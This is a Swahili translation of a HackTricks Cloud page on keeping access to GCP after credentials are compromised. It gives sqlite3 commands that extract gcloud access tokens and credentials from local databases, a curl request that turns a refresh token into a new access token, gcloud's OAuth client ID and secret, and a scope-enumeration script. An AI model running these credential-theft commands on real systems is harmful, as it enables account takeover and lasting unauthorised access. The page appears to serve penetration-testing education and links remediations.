Swahili - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

GCP - Non-svc Persistance

Support HackTricks

Hizi ni mbinu muhimu mara tu, kwa namna fulani, umepata sifa za GCP au mashine inayoendesha katika mazingira ya GCP.

Token Hijacking

Authenticated User Tokens

Ili kupata token ya sasa ya mtumiaji unaweza kuendesha:

sqlite3 $HOME/.config/gcloud/access_tokens.db "select access_token from access_tokens where account_id='<email>';"

Angalia katika ukurasa huu jinsi ya kutumia tokeni hii moja kwa moja kwa kutumia gcloud:

Ili kupata maelezo ya kuzalisha tokeni mpya ya ufikiaji endesha:

sqlite3 $HOME/.config/gcloud/credentials.db "select value from credentials where account_id='<email>';"

Inawezekana pia kupata refresh tokens katika $HOME/.config/gcloud/application_default_credentials.json na katika $HOME/.config/gcloud/legacy_credentials/*/adc.json.

Kupata access token mpya kwa kutumia refresh token, client ID, na client secret tumia:

curl -s --data client_id=<client_id> --data client_secret=<client_secret> --data grant_type=refresh_token --data refresh_token=<refresh_token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token

Uhalali wa refresh tokens unaweza kudhibitiwa katika Admin > Security > Google Cloud session control, na kwa chaguo-msingi imewekwa kwa 16h ingawa inaweza kuwekwa isikome:

Auth flow

Mtiririko wa uthibitishaji unapotumia kitu kama gcloud auth login utafungua kidirisha katika kivinjari na baada ya kukubali scopes zote kivinjari kitatuma ombi kama hili kwa bandari ya http iliyofunguliwa na chombo:

/?state=EN5AK1GxwrEKgKog9ANBm0qDwWByYO&code=4/0AeaYSHCllDzZCAt2IlNWjMHqr4XKOuNuhOL-TM541gv-F6WOUsbwXiUgMYvo4Fg0NGzV9A&scope=email%20openid%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/cloud-platform%20https://www.googleapis.com/auth/appengine.admin%20https://www.googleapis.com/auth/sqlservice.login%20https://www.googleapis.com/auth/compute%20https://www.googleapis.com/auth/accounts.reauth&authuser=0&prompt=consent HTTP/1.1

Then, gcloud itatumia hali na msimbo na client_id (32555940559.apps.googleusercontent.com) na client_secret (ZmssLNjJy2998hD4CTg2ejr2) kupata data ya mwisho ya refresh token.

Kumbuka kuwa mawasiliano na localhost ni katika HTTP, kwa hivyo inawezekana kunasa data ili kupata refresh token, hata hivyo data hii ni halali mara 1 tu, kwa hivyo hii haitakuwa na maana, ni rahisi tu kusoma refresh token kutoka kwenye faili.

OAuth Scopes

Unaweza kupata scopes zote za Google katika https://developers.google.com/identity/protocols/oauth2/scopes au uzipate kwa kutekeleza:

curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-A/\-\._]*' | sort -u

Inawezekana kuona ni upeo gani programu ambayo gcloud hutumia kuthibitisha inaweza kusaidia na script hii:

curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
echo -ne "Testing $scope         \r"
if ! curl -v "https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=32555940559.apps.googleusercontent.com&redirect_uri=http%3A%2F%2Flocalhost%3A8085%2F&scope=openid+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fappengine.admin+$scope+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fsqlservice.login+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcompute+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Faccounts.reauth&state=AjvFqBW5XNIw3VADagy5pvUSPraLQu&access_type=offline&code_challenge=IOk5F08WLn5xYPGRAHP9CTGHbLFDUElsP551ni2leN4&code_challenge_method=S256" 2>&1 | grep -q "error"; then
echo ""
echo $scope
fi
done

Baada ya kuitekeleza ilikaguliwa kwamba programu hii inaunga mkono upeo huu:

https://www.googleapis.com/auth/appengine.admin
https://www.googleapis.com/auth/bigquery
https://www.googleapis.com/auth/cloud-platform
https://www.googleapis.com/auth/compute
https://www.googleapis.com/auth/devstorage.full_control
https://www.googleapis.com/auth/drive
https://www.googleapis.com/auth/userinfo.email

ni ya kuvutia kuona jinsi programu hii inavyounga mkono drive scope, ambayo inaweza kumruhusu mtumiaji kupandisha kutoka GCP hadi Workspace ikiwa mshambulizi atafanikiwa kumlazimisha mtumiaji kutengeneza tokeni na scope hii.

Angalia jinsi ya kuitumia vibaya hapa.

Service Accounts

Kama ilivyo kwa watumiaji waliothibitishwa, ikiwa utaweza kuharibu faili ya ufunguo wa kibinafsi ya akaunti ya huduma utaweza kuipata kawaida kwa muda mrefu unavyotaka. Hata hivyo, ikiwa utaiba OAuth token ya akaunti ya huduma hii inaweza kuwa ya kuvutia zaidi, kwa sababu, hata kama kwa default tokeni hizi ni muhimu kwa saa moja tu, ikiwa mhasiriwa atafuta ufunguo wa kibinafsi wa api, OAuth token bado itakuwa halali hadi itakapokwisha muda wake.

Metadata

Ni wazi, mradi uko ndani ya mashine inayotumia mazingira ya GCP utaweza kupata akaunti ya huduma iliyounganishwa na mashine hiyo kwa kuwasiliana na metadata endpoint (kumbuka kwamba OAuth tokeni unazoweza kupata katika endpoint hii kawaida zimezuiliwa na scopes).

Remediations

Baadhi ya suluhisho kwa mbinu hizi zimeelezwa katika https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2

References

Support HackTricks
PreviousGCP - Logging PersistenceNextGCP - Secret Manager Persistence

Last updated